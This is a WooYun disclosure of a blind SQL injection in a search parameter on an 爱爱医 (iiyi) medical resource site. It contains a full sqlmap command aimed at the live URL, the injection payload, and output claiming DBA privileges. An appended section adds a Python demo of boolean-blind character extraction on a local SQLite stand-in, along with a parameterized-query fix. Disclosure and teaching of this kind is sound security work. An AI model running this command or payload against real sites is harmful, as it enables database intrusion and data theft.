
Vulnerability summary

Defect ID: wooyun-2015-0115808

Title: SQL injection with DBA privileges on an 爱爱医 (iiyi) site

Vendor: 爱爱医

Author: 路人甲

Submitted: 2015-05-24 08:10

Fix time: 2015-05-29 08:12

Disclosed: 2015-05-29 08:12

Type: SQL injection

Severity: High

Self-assessed rank: 18

Status: the vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-24: Details sent to the vendor, awaiting the vendor's handling
2015-05-29: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

As titled.

Detailed description:

[Screenshot: QQ截图20150523235654.png]


[root@Hacker~]# Sqlmap Sqlmap -u "http://ziyuan.iiyi.com/source/search?kw=临床诊疗指南" --dbs --passwords --current-user --current-db --is-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to o
[*] starting at 19:58:35
[19:58:35] [INFO] resuming back-end DBMS 'oracle'
[19:58:35] [INFO] testing connection to the target URL
[19:58:35] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unha
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: kw
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kw=??????' AND 2191=2191 AND 'arWK'='arWK
---
[19:58:35] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, PHP 5.3.8
back-end DBMS: Oracle
[19:58:35] [INFO] fetching current user
[19:58:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:58:35] [INFO] retrieved:
[19:58:35] [INFO] heuristics detected web page charset 'utf-8'
[19:58:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user: None
[19:58:36] [INFO] fetching current database
[19:58:36] [INFO] retrieved:
[19:58:37] [WARNING] reflective value(s) found and filtering out
[20:00:38] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): None
[20:00:38] [INFO] testing if current user is DBA
current user is DBA: True
[20:00:38] [INFO] fetching database users password hashes
[20:00:38] [INFO] fetching database users
[20:00:38] [INFO] fetching number of database users
[20:00:39] [INFO] retrieved:
[20:00:42] [CRITICAL] unable to retrieve the number of database users
[20:00:42] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[20:00:42] [INFO] fetching database (schema) names
[20:00:42] [INFO] fetching number of databases
[20:00:42] [INFO] retrieved:
[20:00:46] [ERROR] unable to retrieve the number of databases
[20:00:46] [INFO] falling back to current database
[20:00:46] [INFO] fetching current database
[20:00:46] [INFO] retrieved:
[20:01:38] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[20:03:05] [CRITICAL] unable to retrieve the database names
[20:03:05] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 7 times

Proof of vulnerability:

(The same sqlmap output as in the detailed description above.)

Fix recommendation:
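The report leaves the fix blank and the sqlmap log shows only the outcome (a boolean-based blind injection in the `kw` parameter against an Oracle backend, with `current user is DBA: True` while every other retrieval failed amid 404s and a dropped connection). The example below is added here; it is not code from the report, from 爱爱医, or from sqlmap. It uses an in-memory SQLite database as a stand-in for the Oracle backend, with assumed table and column names (`sources.title`, a `user_role_privs` table modelled on Oracle's USER_ROLE_PRIVS), and assumes the vulnerable handler builds `title = '<kw>'` by string concatenation, which is the query shape the payload `kw=...' AND 2191=2191 AND 'arWK'='arWK` implies. It shows three things: how a boolean oracle turns one true/false page difference into a character-by-character read of a privileged value (what sqlmap did to get its DBA verdict, here with a simplified role-membership probe rather than sqlmap's exact query); that binding the search term as a parameter (`:kw`, the same placeholder syntax Oracle's OCI drivers and PHP's `oci_bind_by_name` use, which matters since the site runs PHP 5.3.8) closes the hole; and that failed requests are indistinguishable from "false" to a blind probe, so a DBA verdict from a run that logged 404s and a connection failure and could retrieve nothing else should be re-verified before it is quoted as proven.

```python
import sqlite3

# Constructed stand-in for the Oracle-backed search endpoint: an in-memory SQLite
# database with a 'sources' table (the search target) and a USER_ROLE_PRIVS-style
# table holding the privilege a blind attack would read. Names are assumptions;
# the report shows only the payload shape, not the application code.
SECRET_ROLE = "DBA"


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sources(title TEXT)")
    db.execute("INSERT INTO sources VALUES ('临床诊疗指南')")
    db.execute("CREATE TABLE user_role_privs(granted_role TEXT)")
    db.execute("INSERT INTO user_role_privs VALUES (?)", (SECRET_ROLE,))
    return db


def search_vulnerable(db, kw):
    """Assumed shape of the vulnerable handler: kw is concatenated into the WHERE
    clause, so a quote in kw closes the literal and the rest becomes SQL. This is
    what the payload  kw=...' AND 2191=2191 AND 'arWK'='arWK  exploits."""
    return db.execute("SELECT title FROM sources WHERE title = '" + kw + "'").fetchall()


def search_fixed(db, kw):
    """Hardened handler: kw travels as a bind variable, never as SQL text.
    Oracle's OCI/cx_Oracle drivers accept the same :name placeholder syntax."""
    return db.execute("SELECT title FROM sources WHERE title = :kw", {"kw": kw}).fetchall()


def page_says_true(search, db, condition):
    """The boolean oracle behind 'boolean-based blind': the page returns a row
    exactly when the injected condition holds. A request that errors out (the
    404s and dropped connection in the sqlmap log) looks identical to 'false'
    from outside, which is how a noisy run produces wrong verdicts."""
    payload = "临床诊疗指南' AND " + condition + " AND 'a'='a"
    try:
        return len(search(db, payload)) > 0
    except sqlite3.Error:
        return False


def is_dba(search, db):
    """Role-membership probe of the kind sqlmap's --is-dba issues on Oracle
    (simplified illustration, not sqlmap's exact query)."""
    return page_says_true(search, db,
                          "EXISTS(SELECT 1 FROM user_role_privs WHERE granted_role='DBA')")


def extract_blind(search, db, subquery, max_len=16):
    """Read a string one character at a time, bisecting each code point in about
    seven requests. unicode()/substr() are SQLite's spellings of Oracle's
    ASCII()/SUBSTR(). Past the end of the string the comparison is NULL, which
    the AND turns into 'false', so the bisection settles on 0 and the loop stops."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            cond = "unicode(substr((%s),%d,1))>=%d" % (subquery, pos, mid)
            if page_says_true(search, db, cond):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:
            break
        out += chr(lo)
    return out


class Flaky:
    """Wraps a search function and fails every n-th request, modelling the
    HTTP 404s and the retry in the log: a blind verdict taken during such a
    run can silently come out wrong."""

    def __init__(self, search, every):
        self.search, self.every, self.calls = search, every, 0

    def __call__(self, db, kw):
        self.calls += 1
        if self.calls % self.every == 0:
            raise sqlite3.OperationalError("simulated HTTP 404 / dropped connection")
        return self.search(db, kw)


if __name__ == "__main__":
    db = build_db()
    role_q = "SELECT granted_role FROM user_role_privs"
    print("vulnerable, is DBA:", is_dba(search_vulnerable, db))
    print("vulnerable, role read blind:", extract_blind(search_vulnerable, db, role_q))
    print("fixed, is DBA:", is_dba(search_fixed, db))
    print("fixed, role read blind:", repr(extract_blind(search_fixed, db, role_q)))
    print("vulnerable but noisy:", extract_blind(Flaky(search_vulnerable, 5), db, role_q))
```

Against `search_vulnerable` the role comes back as `DBA` and the DBA probe is true; against `search_fixed` both the probe and the read fail, because the quoted payload is compared as a literal title. With `Flaky` dropping every fifth request the read returns a corrupted string, which is the practical check behind the caveat above: the 404s and the `unable to connect` retry in the log mean the `current user is DBA: True` line was produced under exactly the conditions in which a boolean-blind verdict can be wrong, and it should be confirmed with a manual pair of requests (`AND 1=1` versus `AND 1=2` in the same payload shape) on a stable connection.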

Copyright notice: reproduction must credit the source, 路人甲@乌云


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-05-29 08:12

Vendor reply:

Vulnerability rank: 15 (WooYun rating)

Latest status:

None